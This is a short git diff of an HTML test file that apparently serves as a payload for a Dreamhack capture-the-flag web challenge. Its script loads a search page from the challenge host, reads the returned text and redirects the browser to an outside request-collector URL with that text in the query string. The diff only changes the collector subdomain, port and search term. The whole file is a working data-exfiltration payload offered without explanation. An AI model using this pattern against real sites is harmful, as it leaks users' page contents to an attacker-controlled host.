--- a/static/js/test.html
+++ b/static/js/test.html
@@ -6,11 +6,11 @@ function req(url) {
     script.onload = () => {
         setTimeout(() => {
             if (document.body.innerHTML.includes("not found")) {
-                parent.location.href = "https://sawhdhi.request.dreamhack.games/?result=failed";
+                parent.location.href = "https://tndjosf.request.dreamhack.games/?result=failed";
             } else {
-				let resultText = document.querySelector("pre").innerText;
+				let resultText = window.document.querySelector("pre").innerText;
 				console.log(resultText);
-                location.href = `https://sawhdhi.request.dreamhack.games/?result=${resultText}`;
+                location.href = `https://tndjosf.request.dreamhack.games/?result=${resultText}`;
             }
         }, 500);
     };
@@ -18,6 +18,6 @@ function req(url) {
     document.head.appendChild(script);
 }
 
-req('http://host1.dreamhack.games:20416/search?query=dreamhack');
+req("http://host1.dreamhack.games:11005/search?query=DreamHack");
 </script>
 </html>
